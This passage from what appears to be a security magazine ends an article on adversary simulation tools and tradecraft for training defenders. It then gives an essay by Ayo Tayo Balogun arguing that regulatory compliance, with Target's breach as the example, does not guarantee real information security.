- The average time for attackers to conduct reinfection attempts after an organization completes initial
remediation
- The percentage of organizations impacted by more than one attack group at a time
- The percentage of organizations who are detecting attacks internally versus those that are being
notified by third parties
- The factors that influence effective and efficient investigation and remediation
- Why some organizations remediate successfully and efficiently, and why others struggle
THE TOOLS
The tool needs for Adversary Simulations are far different. A unique covert channel matters far more
than an unpatched exploit. A common element of Adversary Simulations is a white box, assumed
breach model. Just as often as not, an Adversary Simulation starts with an assumed full domain
compromise. The goal of the operator is to use this access to achieve effects and steal data in ways
that help exercise and prepare the security operations staff for what they're really up against.
Remember, too, that the threat actor in a production environment may also be an employee of the
company, acting inside the corporate network.
TRADECRAFT
Raphael Mudge uses the term Tradecraft to describe the mindset for Adversary Simulations. He says
that they require an appreciation for the efficacy that simply isn't there in the penetration testing
community yet. Tradecraft is the set of best practices of a modern Adversary. What is the adversary's
playbook? What checklists do they follow? Why do they do the things they do? These are questions
that need to be asked by a corporation's security defenders.
Impact of compliance
on information security
by Ayo Tayo Balogun
"Target was certified as meeting the standard for the payment card industry in
September 2013. Nonetheless, we suffered a data breach." (Target Chairman,
President, and Chief Executive Officer Gregg Steinhafel)
In Information Security, there are a plethora of Laws and Regulations: Sarbanes-Oxley Act (SOX);
Payment Card Industry Data Security Standard (PCI DSS); Gramm-Leach-Bliley Act (GLB); Electronic
Fund Transfer Act, Regulation E (EFTA); Customs-Trade Partnership Against Terrorism (C-TPAT); Free and
Secure Trade Program (FAST); Children's Online Privacy Protection Act (COPPA); Fair and Accurate
Credit Transaction Act (FACTA), including the Red Flags Rule; Federal Rules of Civil Procedure (FRCP).
Some of the industry-specific Guidelines and Requirements include: Federal Information Security
Management Act (FISMA); North American Electric Reliability Corp. (NERC) standards; Title 21 of the
Code of Federal Regulations (21 CFR Part 11) Electronic Records; Health Insurance Portability and
Accountability Act (HIPAA); The Health Information Technology for Economic and Clinical Health Act
(HITECH); Patient Safety and Quality Improvement Act (PSQIA, Patient Safety Rule); H.R. 2868: The
Chemical Facility Anti-Terrorism Standards Regulation. How many of these Regulations, Laws and
Guidelines a business needs to adhere to depends on what part of the world the business
operates from (or is domiciled in).
Laws, Regulations, Standards and Guidelines are very familiar words when it comes to Information
Security. One other word that ties all the previous words together is Compliance. Compliance, generally
speaking, is the basis for audits. Compliance is also the native language the Executive Management
of any enterprise understands. The great debate for us, however, is: does compliance really translate
to good security?
It creates the understanding, at all levels in the organization, that finding the appropriate balance
of availability, integrity and confidentiality requires a full appreciation of the risks.
The rush for Compliance has more or less taken center stage in recent times, and a lot of businesses
(and the people driving those businesses) forget or are unaware of the fact that Information Security
needs should primarily be the driving force for Compliance criteria/metrics; the compliance barrier should not
be erected for its own sake. In order to achieve good security, appropriate processes,
practices and technologies need to be implemented. In 2014, the FBI sent a warning to the healthcare
industry that its data was not secure. The biggest vulnerability was IT healthcare
professionals' belief that their current perimeter defenses and compliance strategies were working
when clearly the data states otherwise.
Lots of organizations focus on compliance and have several reams of paper to show for it: policies,
procedures, and training records. Several of these organizations purchase compliance-in-a-box kits,
and because the focus is on compliance and not really security, much of the content of the
compliance-in-a-box kit still has the original blank spots where the name of the organization in question
should have been inserted. A lot of the organizations that eventually complete their documentation might never
incorporate the documentation into the corresponding process. Additionally, because assessment for
compliance might be primarily based on responding to hundreds of questions in compliance
assessment tools, or discussing with consultants, many businesses will maintain that the security
described in their policies and procedures is really in place. They might even believe it themselves!
Ensuring that the IT security team is knowledgeable and dedicated is also a major requirement that
needs to be addressed. One can never know how truly secure a system is until it has been tested. The
IT security team (complementary to the testing by external consultants) needs to routinely conduct
penetration testing exercises to evaluate every facet of the business process, not with the intention
of achieving regulatory compliance but with the objective of determining the security posture of the
business in order to apply any needed corrective measures before vulnerabilities are exploited by
hackers.
About the author:
AYO TAYO BALOGUN